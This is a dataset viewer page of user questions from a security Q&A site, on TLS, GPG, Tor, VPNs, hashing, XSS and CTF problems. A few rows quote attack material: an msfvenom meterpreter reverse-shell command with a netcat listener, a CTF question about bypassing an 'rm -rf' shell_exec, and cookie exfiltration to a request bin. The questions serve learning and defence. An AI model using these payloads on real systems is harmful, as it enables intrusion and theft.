instruction stringlengths 24 29.9k |
|---|
I have developed web app, and my customer is saying this piece of code is vulnerable:
<a href="#" onclick="count.it('count', 9); console.log(1);">Click
"9" is injection point
however its in "template" page and count.it is not defined, so not executing console.log(1), is he right and this is security flaw made by me? ... |
Malware on the firmware level can potentially mess with data on the storage device. There is no point in doing that for encrypted data except maybe corruption. But what about a smartphone or other device with dm-verity where the system partition is not encrypted. Could this kind of malware break dm-verity?
|
I am currently doing bug bounty on a company which uses GRAPHQL for their query language and would like to check if CSRF is possible. After playing around with burpsuite I have conclude the following;
Company doesn't use csrf token when fetching data
Origin and Referer can be erased and request will still work
If the... |
There's something I don't understand about signatures in Google Maps APIs.
The documentation says "We strongly recommend that you use both an API key and digital signature, regardless of your usage". In this case we are talking about the Maps Static API, where requests are made by the frontend with a URL that generates... |
I do a distance education program in Australia. My distance ed school sends out laptops to all students on loan until they leave school/the program. The laptop is specifically a Lenovo Thinkpad Yoga 11e (5th Gen) if that makes a difference. My worry is that one of the head teachers had informed us they can tell if you ... |
A website I frequent (a Discourse forum) uses Let's Encrypt TLS certificates which are updated every two months with a valid period of three months. But the certificate information shown by Chrome says that the certificate is out-of-date and invalid. Oddly, when you click the padlock icon it does still say "Certificate... |
I am downloading large files with their checksums/hashes on a Linux machine with the DNS manually setup to use a publicly available trusted DNS, e.g., Google's 8.8.8.8 since I am aware that DNS can be spoofed to possibly host a compromised version of the files as well as the corresponding checksums/hashes.
If I were to... |
I am dealing with this problem. I have created a REST API with some resources. Some are app to app based and therefore I expect to get only the Authentication header with my token (client_credentials token). I am using keycloak to validate the tokens.
Now I am introducing other resources are that are client-owned, thes... |
Having successfully integrated my old web forms app with an ADFS server I got to thinking about how the process works as a whole. The old app passes the user to the remote ADFS, then eventually the user arrives back in our server having a signed-in identity of joe.schmoe@somedomain.com but I'm not entirely clear on whe... |
I'm doing some research on PHP's str_shuffle function, I already asked this question multiply times on StackOverflow but got no answer https://stackoverflow.com/questions/61968859/is-it-possible-to-predict-the-next-output-for-the-str-shuffle-function-in-php.
I'm interested in how would you break str_shuffle, since PHP'... |
I don't have my phone at the moment, since I turned it over yesterday at the shop for a screen replacement.
The SIM card is removed and it's sitting in my wallet now.
When I opened WhatsApp Web a couple minutes earlier today, I was connected to my account and could send and read new messages. This connection continued ... |
When I try to access some web site on firefox I get this:
The cut out rectangle is COMPANY-NAME-ROOT-CA and that issuer (COMPANY-NAME-ROOT-CA) was also added as trusted on some peoples PC.
But when I visit same site using chrome I don't get such warning and certificate issuer seems to be legitimate (e.g. Let's Encrypt... |
For most reverse shell here, I can simply use netcat to connect:
nc -nlvp 1234
But for reverse shell created by msfvenom, for example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx
I CANNOT use netcat to connect.
Instead, use msfconsole to connect:
use exploit/multi/handler
set paylo... |
I came across an infosec presentation from a conference which discussed how ICMP packets can be used to compromise a connection between two machines. More specifically, they described the process as:
The attacker can forge a spoofed ICMP packets to force the host to make an ARP request. As a response, an illegitimate ... |
When testing our c# application with a service from a new supplier our request was denied because the client certificate was not send.
Network traffic with a service where our application is known to work with shows us this:
Client Hello
Server Hello, Certificate, Certificate Request, Server Hello Done
Certificate, Cli... |
Context
In another question about password generation, I have read an answer suggesting something along the line of:
Let your password manager select characters from all the accepted categories (lowercase, uppercase, digits, standard punctuation, extended ASCII characters) and choose a very long length.
If the target ... |
If two persons are pulling the same docker image (let's say Debian:10.4), they will obtain the same "files" (layers) from the docker repo.
So, from what I understand, launching a docker image is not exactly like a fresh install, it is more like a preinstalled OS. So I guess the two docker images debian:10.4 launched in... |
Say Alice produces a bit of intellectual property, let's call it X. Alice is all for the freedom of information, so publishes X, without charge, electronically (e.g., on her website), asserting her copyright.
Bob comes along and finds X. He is so captivated by the content of which, he is moved to jealousy: He republish... |
I like to generate a public-private key pair that is seeded from a string. So having the string and the generation algorithm is enough to recreate the keys. I want to do this because I can then combine a password (that I'll memorize), with a long, secret (randomly generated) text file (that I'll store securely), and ge... |
In the SSH spec, Section 7.1, key exchange algorithms are distinguished based on whether they require an "encryption-capable" or a "signature-capable" host key algorithm.
If I understood their details correctly, the well-known DH-based key exchanges algorithms such as curve25519-sha256, diffie-hellman-group14-sha256 an... |
Third-party password managers such as 1password, etc. are useful for people, businesses, etc. to store passwords. But I bet Facebook, Google, Twitter and other super big tech companies don't use such third-party services for their internal passwords and have their own password managers for their most critical passwords... |
I'm currently doing an online CTF and I have LFI an can read the source code of the upload function. In there I see the following line:
shell_exec('rm -rf ' . directory/ . '*.p*');
So anytime I upload a .php file, it gets deleted.
Is there a way to break out the code so the remove of *.p* file never happens or can I e... |
I need to backup files with preserved attributes from a source workstation to a LAN server (both on Linux Mint, the server is running sshd and Samba). One of the solutions which preserves files' source attributes is to run rsync over ssh, something like that on the client side:
rsync -a --rsync-path="sudo rsync" -e ssh... |
My question is based on to secure REST API's. We have to publish a REST API and we want only certain consumers to consume the API. I was thinking of one way is to use asymmetric encryption.
The steps I was about to follow:
Generate a public/private key pair
Export the public key in the form of X.509 certificate
Share ... |
I use Transport Layer Security (TLS) and I am building a prototype for a client application that will only talk to an authenticated server.Even if I wind up using certificates to authenticate the server, I should not use the same certificates to protect the communications channel and to authenticate the server.so :
"Sh... |
I'm trying to figure out how to cross-sign two keys. One reference says we should use:
gpg --local-user 0xfedcba98 --edit 0x76543210 sign
gpg --local-user 0x76543210 --edit 0xfedcba98 sign
That's an old reference, so I assume we should be using --edit-key now. When I try, I am able to get the first key to sign the s... |
Thirdparty pentest company reported their findings in our iOS app.
In the report explanation for this vulnerability is
Apple provides default encryption for applications; however, the encryption could easily
be bypassed by using publicly available tools such as Clutch. This was verified by
performing static analysis t... |
I'd like to know what are the risks having a subdomain managed by third party. For example, I manage my own DNS servers to serve mydomain.example which provide some internal and public content. If I develop a Cloud app on a Cloud provider and I want the domain for this app served by this Cloud provider, let's say sub.m... |
I am planning to evaluate and install a publicly available software.
https://github.com/opensemanticsearch/open-semantic-search
While reviewing the issues on github, there is an issue open which indicates possible remote code execution for Solr with screenshots.
https://github.com/opensemanticsearch/open-semantic-searc... |
I know there are many limitations for data storing and processing by PCI DSS. Some of them are explained here. https://www.pcisecuritystandards.org/pdfs/pci_fs_data_storage.pdf
But I can't find any info about storing customers' billing addresses. Is this means that PCI allows it for any merchants / service providers?
|
Snowflake is a cloud database like Google BigQuery or Amazon Redshift. Unlike them, however, it markets a "Secure Data Sharing" feature.
They go to some effort (including a full "Data Sharing for Dummies" book) to position this as something unique. In terms of clearly defining who has access to what in a user-friendly ... |
Recently, there has been some news articles about unsolicited attacks on unsecured public facing Elastic and Mongo databases. These are commonly being called "Meow" attacks, resulting in entire databases being deleted without ransom or warning.
My question is:
What is the nature of the attack (How is the database bein... |
For once, I'm not talking about digital signatures. I'm talking about good old-fashioned pen and paper signatures.
Should I protect my signature like I protect my passwords? Is it a genuine security risk if my signature is known? Intuitively this doesn't make sense to me because many famous signatures are well-known, a... |
I just set up a lab with bwapp and wanted to jump straight into webshell.
I used Unrestricted file upload vuln --> uploaded my perfect shell created with msfvenom.
My only problem is that my session doesn't seem persistent as I'm getting Meterpreter session opened and then died.
For more context, bwapp is on a bridged ... |
I had to call customer service recently regarding my 401(k) and robo call in the beginning asked me to enter my social security number using the keypad followed by a # and then asked for my account password using the keypad followed by # where special characters are *.
If the passwords are stored as hashes in their dat... |
Many Linux distributions (e.g. Fedora) recommend using downloaded signing keys to verify the integrity of downloaded checksums. This seems utterly ridiculous to me, since the downloaded keys are just as suspect as the downloaded checksums. And checking key fingerprints is exactly the same thing, i.e. the page with the ... |
Two questions on signatures.
I am trying to understand the various types of "trust signature". The man page says, "For more information please read the sections “Trust Signature” and “Regular Expression” in RFC-4880." Rather than go to the RFC, maybe someone could help with these basics.
We have these choices when r... |
I am doing some unattended key generation using --quick-gen-key and --quick-add-key. I am not clear if the user-id mentioned in the man page offers a way to include a comment:
--quick-generate-key user-id [algo [usage [expire]]]
I usually see this used as "My Name My@email.com".
|
I am designing a system that uses a certain biometric vector as a secondary user identification step before authorizing a payment. My system does not handle payment card details, rather the payment card processor consumes my service to authenticate the user (as an additional step). In order to do this, my system needs ... |
Saw this in the journalctl for a service I have:
jul 29 12:39:05 ubuntu-18 node[796]: GET http://www.123cha.com/ 200 147.463 ms - 8485
jul 29 12:39:10 ubuntu-18 node[796]: GET http://www.rfa.org/english/ - - ms - -
jul 29 12:39:10 ubuntu-18 node[796]: GET http://www.minghui.org/ - - ms - -
jul 29 12:39:11 ubun... |
How should one structure and how should a Security Team work in an agile organization (100 devs).
Found this article:
https://kislayverma.com/organizations/independence-autonomy-and-too-many-small-teams/
Where I agree with it, for software dev, I am not sure if this will be applicable to Security Teams.
Security Team i... |
Goal
To hide the IP address using Tor, which goes through a proxy server to make HTTP/FTP requests look like they came from a regular user, not one who uses Tor.
Example
A user requests the website. The request goes through the user's VPN, which then goes through Tor, which connects to a proxy server that finally makes... |
I am a currently analyzing the available Cloud services allowing End-To-End Encryption for file sharing.
It looks like, for each solution I found, if Alice wants to send an encrypted file to Bob, she will have to trust the server when she will ask for Bob's public key, in order to send him the "file key" securely.
My q... |
Can someone have access to my iPhone if my router is compromised?
Such as:
having access to my Gmail app on iPhone
access to my Gmail/other passwords
be able to send or delete mails via iPhone?
|
Let's suppose we have a software update D, that is encrypted and signed and delivered to some component C. Further we suppose that the receiving entity C can validate the signature and decrypt the software successfully.
I asking myself whether the sending entity needs to authenticate itself to C, e.g. by means an authe... |
https://dnscrypt.info/faq/ states for both DNS over HTTPS and DNS over TLS that it
Provides more information than regular DNS to resolver operators in order to fingerprint clients
How so?
|
How I can fuzz a request with 3 parameters (locations) and 3 payloads:
request1 => parameter1=payload1.1;
parameter2=payload2.1;
parameter3=payload3.1;
request2 => parameter1=payload1.2;
parameter2=payload2.2;
parameter3=payload3.2;
request3 => parameter1=payload1.3;
... |
I'm currently completing an XSS challenge in a CTF. I successfully redirect the admin cookie to my request bin, but the flag is said to be invalid.
I am told this is because the flag string gets transformed when I try and send it to my own server (e.g. URL encoding messing something up). How would I go about properly e... |
I'm getting regular attacks
2020-07-29 14:44:42 Security Warning Intrusion -> SRC=80.227.225.108 DST=(my ip here) LEN=40 TOS=0x00 PREC=0x00 TTL=235 ID=63607 PROTO=TCP SPT=52363 DPT=1433 WIN
it's every 10 mins as I can see
I changed wifi password and made it hidden AP and the attacks still coming.
I even disconnected... |
Can the password that one type be compromised if mobile is connected to a compromised router since everything has to go through the router?
|
I'm reading up on some OpenID Connect documentation trying to get my head around the protocol. I came across the issuer property that is common in the JWT tokens. How come this is required if we should always check the signature of the token against the expected endpoint?
I understand that one can validate against eith... |
I have noticed earlier that my Macbook Pro camera light was lit on - the screen is turned off but not sleeping - the entire time the device was not being used or touched. I logged in to investigate and I have found that Microsoft Edge (Chromium) was on with a few tabs. The moment I tried to navigate through it, Edge br... |
I am trying to use sqlmap. Although every time I use it, I just get a response of:
[13:39:11] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[13:39:11] [INFO] testing if the target URL content is stable
[13:39:12] [INFO] target URL content is stable
[13:39:12] [CRITICAL] no... |
I have Tor Browser (which is basically Firefox ESR) on "Safest" setting (Javascript disabled). We're generally scolded about using extensions in it, as they can alter web traffic patterns to or from your browser, adding another fingerprinting vector by distinguishing you from other Tor Browser users.
If JS is turned of... |
I read Tor's Wikipedia page and found out it has 12 weaknesses. What can people or The Tor Project do about those weaknesses? If they don't anything about it, wouldn't it compromise Tor users' anonymity?
|
Let's assume I have a website where I have to either redirect the user to another URL or include another URL in an iframe, that is given by a GET parameter.
I cannot use HMAC when the URL is created. The site is designed to work with relative URLs.
e.g. login.php?redirect=profile.php
This is vulnerable to open redirect... |
I'm building a checkout page for a website and have a checkout page with a content security policy (CSP).
When the customer pays with a card, they will see a box popup with the bank page that allows the bank to verify (if they want).
The problem I have is that the box that pops up is an iframe and I don't really want t... |
I have my own CA(CA) and 2 intermediate(ICA1 & ICA2) CA's(generated using the root CA).
Using ICA1, generated a server cert(for server S1) and 2 user cert(for user U1 & U2).
Now, user certs is distributed to the user-U1 & U2(including chain trust ICA1 & CA) and they are able to successfully connect to S1.
Similarly usi... |
Can I perform evil twin attack with my WiFi card and Kali Linux PC or do I need an adapter for the attack?
|
I am collecting data (by reading input registers) from a machine by RS-485 protocol and Arduino Mega 2560 hardware.
I am also sending this data from Arduino Mega to a NodeMCU which is connected to the internet over WiFi.
I made 100% sure that no physical interference can be performed on the hardware I setup.
But since ... |
I have one HTTP request which is responding with no content value (No response body).
Is it necessary to have a content-type header specified for these kinds of responses?
|
I was looking through my spam folder, and there's a 100% sure spam email, that asks me to confirm that I want to unsubscribe by clicking some big unsubscribe button. That button is simply a mailto: link, similar to the one below
mailto:user@inactivedomain.com;someotheruser@gmail.com;moreusers@mailbox.org;etc@inbox.ru;e... |
I'm trying to get 3rd party cookies to work on major mid-year 2020 browsers [1]. It's as simple as pointing an iframe to an external URL to make a cookied request and probably get the response thereafter (and the external site explicitly allows this).
Is there a solution to this problem? For example, some other header... |
Is there a way to use a device like a raspberrypi to create a kind of 'Plug and Play' TOR proxy?
Ideally, a device would exist with an ethernet port as input and ethernet cable or USB as output which can be plugged into a laptop or PC without any further configuration on the client PC.
The device should then automatica... |
Being not a cryptography expert, I am having some basic questions on how to manage keys wrt. sodium-plus. Let me briefly explain the context: the use case involves sending data from a web frontend to a backend, but the backend should not be able to read it (deliberate design choice due to privacy concerns). The data in... |
I have a super admin certificate which expired two days ago. When I try to click on the Administration tab in my EJBCA instance to renew this certificate, I am getting an error like certificate has expired. Can you guys help me out on how to renew the certificate without the GUI? Is this the problem impacting the Admin... |
This question asks whether one should hash on the client or the server. I want to know if there is any reason, aside from having to maybe handle one extra hashing library (if it's not already in your security stack), why you wouldn't want to hash both on the client and on the server. Extra code complexity is fine, you ... |
Is there a need to secure winform application in an intranet environment? Clearly, there is no external threat and only authorized personnel have access to the intranet environment, so I am not sure if there is a need to secure it. Unless it's an insider threat, however, it's still impossible as there isn't any necessa... |
If a malicious software gets into a virtual machine, what is the most information of the actual machine it can obtain?
|
what if data we are sending is such that
size(data) + size(mac) =multiple of block size
If this case if possible how the receiver will determine that no padding is present
???
|
Is there anyway I can know if the cable I use to charge my phone in it was connect to my pc before or not? Is there something in pc can let me see that because my pc contain some malware and spy files that comes to it through another phone because I used to use all cables and connect them to pc so I decided to format m... |
Do browsers have a list with sites that are supposed to be encrypted?
Could a man in the middle attack be performed by presenting a user a http site instead of an https site? That way the server would not need to provide a certificate.
It wouldn't show up as a secure site in the browser but I think most people wouldn't... |
I have a domain lets call it example.com when I do: dig example.com MX +short, it returns:
10 mx1.[Internet_Service_Provider_Domain]
so, I decided to trace the DNS to check if there any possible DNS Hijacking attack, using the following command: dig example.com MX +trace +short, the result:
NS d.root-servers.net. from... |
We are considering to build a Windows application that is split in 2 parts:
one Windows service
some Add-Ins for Microsoft Office, Microsoft Management Console (MMC) and PowerShell.
Additional info:
The service and the Add-Ins are digitally signed with a
company certificate.
All running on the same machine.
The serv... |
I installed kali linux, that comes with John the ripper. I have a password-protected zip file. I'm pretty sure the password is complex. I first convert the zip into a hash:
sudo zip2john FILE_LOCATION > zippedzip.txt
It took around 20 seconds to run that command.
I got this output:
Then I try running john on it:
sudo... |
So I am wondering how can I see the data on wireshark?
I have my router setup to where there is no password so I can automatically connect whatever devices on to my network.
First I connect my phone and next I run wireshark and I have a usb wifi adapter to capture/inject packets.
I also have wireshark in monitor mode a... |
I'm a total noob, so please help me out.
Suppose something is hashed in sha256. If we know the value of some part of the hashed text, can we figure out the entire text?
Ex: xxxxxx + j4l58jl6j4l6j4 = 64j1l5l64lkh41l654kj165l4j1566ghj6ghj6g1.
All are hypothetical values. So, we know that the value on the right hand side... |
I am setting up AWS stuff and wondering how to setup a secure bastion host. They all say to only allow access to your IP address, but how can I do that if my IP address is changing every few hours or days (just in my house wifi, or going to coffee shops, etc.). What is best practice here, for SSHing into a bastion host... |
I am wondering how you should setup your network (AWS) so you can debug different things that might occur. Obviously there's logging, but it seems at some point you might require SSHing into the actual machine of interest and checking around. If this is the case, it seems you would need to open up port 22 on every mach... |
I have been working from remote full time for months.
Every day I connect my computer to my company network. Is there a way to hide or change my geographic location?
I mean, I would like they wouldn't know where I am.
Is a VPN enough?
|
There are so many tools such as testssl, sslyze to test the TLS configurations on webservers. I wanted to know, why aren't there any tool that checks the TLS client side? What makes it difficult?
|
I am new to VPNs, have used them a few times, have read about "how they work" (which is all very high level), and am now confused about how this is actually implemented (so I can come full circle and understand what kind of security they are providing me).
It sounds like a VPN is something you install on your computer.... |
Stumbled upon a privacy conscious hosting provider that uses LXD vs KVM to manage user VPS instances.
My understanding is KVM is more isolated so using LXD doesn’t make sense from a privacy perspective.
Perhaps I am missing something?
|
I've this error:
ModSecurity: Warning. Matched "Operator `PmFromFile' with parameter `lfi-os-files.data' against variable `ARGS:scope' (Value: `email profile https://www.googleapis.com/auth/userinfo.profile https://www.googleapis.com/auth/useri (16 characters omitted)' ) [file "/usr/local/owasp-modsecurity-crs-3.0.2/ru... |
I'm looking for an unusual solution that uses the SFTP server for data transfer but said SFTP server also should act an encryption proxy i.e. all the data it stores on the server-side should be encrypted. Although I could use host (OS-wide) encryption it is not gonna be effective during runtime if the hoster I use deci... |
I was just wondering if this code is enough to prevent XSS vulnerability in my web app?
/**
* Escape HTML string to prevent XSS.
*/
export const escapeHtml = (string: string): string => {
if (isString(string)) {
const entityMap = {
"&": "&",
"<": "<",
">": ">"... |
We have an exe file that our members have been using. It was submitted to VirusTotal and it returned one red flag:
How can we have the app evaluated by a 3rd party software engineer? And how likely is it the app can be evaluated accurately?
|
I've talked with a new friend who is fairly bright and who can do some interesting things programming Office applications, but whose technical abilities omit infosec. And he got bitten by nasty malware.
I'm wondering what options might be most productive to offer to him. I'm not sure it's realistic to repel all dedicat... |
I found a used docking station for my Dell laptop. The price is very interesting and the docking station seems to be in perfect shape. But I'm somehow worried about potential security risks. After all, you could install some kind of keylogger in the station's firmware. Am I being paranoid here or is it possible in any ... |
I'm trying to learn a bit about authentication and security protocols at a 10,000 foot level. I was reading about WebAuthn here: https://webauthn.guide/ and here:
https://webauthn.io/
I'm sure what I'm about to ask has obvious answers, because this protocol has been developed by smart people with probably decades of ex... |
I was wondering when people compile malware and use the compiled files for engagements or nefarious purposes, what evidence do they leave behind in the compiled Windows executables? I have heard that the OS usernames of the compilers can be disclosed upon analysis of the executable. Is it true? Is the evidence left beh... |
I am very new to docker (and don't usually program at a 'systems' level). I will be working on an open source project with complete strangers over the web over the next couple of months. I trust them, but I like to not have to trust people (meant in the best possible way).
I would like to know, if I download various re... |
To be more clear, I would like to access movie streaming websites which have lots of (pop-up) ads and I’m fearful that I might deal with viruses.
Would VirtualBox help me isolate this type of viruses? What can I do to prevent this?
|
Izito and similar sites keep appearing on my search engine results. It started a few weeks ago. It has been happening on both - my Ubuntu and Windows computer, and even on a new Windows computer. It has been happening on Chrome and Microsoft Edge and on Google and Bing. I have since installed Bitdefender AV and done fa... |
For customer support reasons, we need to store passwords to some of our customers' systems (with their explicit, written permission, of course), as well as, obviously, passwords to some of our own systems. Customer support agents and administrators need to be able to access those passwords.
I am aware that - despite al... |
As a developer I do have some understanding of OWASP, I am also a member of OWASP community, official due paying one. Anyway, what I may not understand is information security in that I am not a security engineer and so I pose the following question:
Is it necessary to encrypt and encode a JSON Web Token?
In my experie... |
I was reading documentation about HTTP/3, and in the article, they sed that they are no longer TLS or TCP.
So it's mean that a web site with no SSL 80 will be changed to what port and 443 will be replaced with what port? Also how CA will make SSL UDP compatible?
|
A friend of mine has an old family PC with a bunch of important photos on it. Unfortunately, from what he told me, it seems like they have fallen victim to a tech support scam some five years ago, during which the scammer had remote access to their machine. They haven't used this PC ever since that incident, because th... |
A family of N people (where N >= 3) are members of a cult. A suggestion is floated anonymously among them to leave the cult. If, in fact, every single person secretly harbors the desire to leave, it would be best if the family knew about that so that they could be open with each other and plan their exit. However, if t... |
I downloaded Rufus and Win32 Disk Imager from Sourceforge and used them on a flash drive to boot another operating system. I'd like to know if it's possible that one of these infected my OS or firmware and how to find out if the firmware or OS are infected besides Antivirus for the OS?
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.